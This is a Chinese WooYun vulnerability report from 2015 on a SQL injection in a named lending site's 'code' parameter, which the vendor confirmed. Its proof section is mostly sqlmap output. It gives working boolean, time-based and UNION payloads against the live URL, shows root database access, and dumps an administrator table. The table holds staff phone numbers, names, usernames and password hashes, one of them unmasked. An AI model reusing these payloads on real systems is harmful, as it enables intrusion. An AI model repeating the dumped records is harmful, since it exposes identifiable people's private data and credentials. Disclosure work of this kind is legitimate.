当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112422

漏洞标题:贷蚂蚁主站SQL注射可导致多个管理员信息泄露(root权限)

相关厂商:daimayi.com

漏洞作者: 路人甲

提交时间:2015-05-06 16:18

修复时间:2015-06-20 16:52

公开时间:2015-06-20 16:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-06: 细节已通知厂商并且等待厂商处理中
2015-05-06: 厂商已经确认,细节仅向厂商公开
2015-05-16: 细节向核心白帽子及相关领域专家公开
2015-05-26: 细节向普通白帽子公开
2015-06-05: 细节向实习白帽子公开
2015-06-20: 细节向公众公开

简要描述:

233

详细说明:

http://www.daimayi.com/index.php/Apply/get_census?code=
root权限!

漏洞证明:

Parameter: code (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=') AND 8266=8266 AND ('dsZz'='dsZz
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: code=') AND (SELECT * FROM (SELECT(SLEEP(5)))smIz) AND ('qvdz'='qvdz
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: code=') UNION ALL SELECT NULL,NULL,CONCAT(0x7162716a71,0x454c55726d6641706e4c,0x716b716a71),NULL--
---
web server operating system: Windows
web application technology: ASP.NET, PHP 5.5.7
back-end DBMS: MySQL 5.0.12
database management system users [1]:
[*] 'root'@'localhost'
available databases [4]:
[*] huomayi
[*] information_schema
[*] mysql
[*] performance_schema
Table: t_admin
[7 entries]
+----+---------+-----+--------+-------------+----------------------------------+------------+------------------------------+-----------+-------------+
| id | role_id | sex | status | telphone | password | add_time | true_name | user_name | work_number |
+----+---------+-----+--------+-------------+----------------------------------+------------+------------------------------+-----------+-------------+
| 1 | 9 | 0 | 1 | 15529182520 | 585f1869b32b5**968156a0a6b287b1e | 1407848436 | \\u7ba1\\u7406\\u5458 | admin | 001 |
| 10 | 7 | 1 | 1 | 13892365487 | 324cb56bb63a0***47957db3fea0ce76 | 1430102269 | \\u5f20\\u5353\\u5a05 | xiaozhang | 031 |
| 6 | 7 | 1 | 1 | 13893250038 | baaada81ff8c86a**942f05a1e5b6c33 | 1427850240 | \\u674e\\u5a1f | xiaoli | 011 |
| 7 | 8 | 0 | 1 | 13985689234 | d5f79627803de***e7065236da96c35b | 1427969895 | \\u5f20\\u6ce2 | zhangbo | 002 |
| 8 | 8 | 0 | 1 | 18009172450 | b033ae32a829c0d4d3b3d2c26dd721de | 1428408503 | \\u738b\\u6c38\\u5174 | xunxing | 003 |
| 11 | 7 | 0 | 1 | 11111111111 | e45a350aa8d46b***08763425a93c683 | 1430707389 | \\u6d4b\\u8bd5\\u5e10\\u53f7 | liudaye | 123 |
| 9 | 7 | 1 | 1 | 18691733337 | 3b0fc589201c991****2ac9f54e5cd02 | 1428890116 | \\u738b\\u5a77 | wangting | 032 |
+----+---------+-----+--------+-------------+----------------------------------+------------+------------------------------+-----------+-------------+

修复方案:

密码估计早已被泄露,记得改密码!!!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-05-06 16:51

厂商回复:

已经修改信息,技术人员已在修补漏洞,谢谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-06 16:36 | r3nty ( 路人 | Rank:2 漏洞数:3 )

    绕过狗了?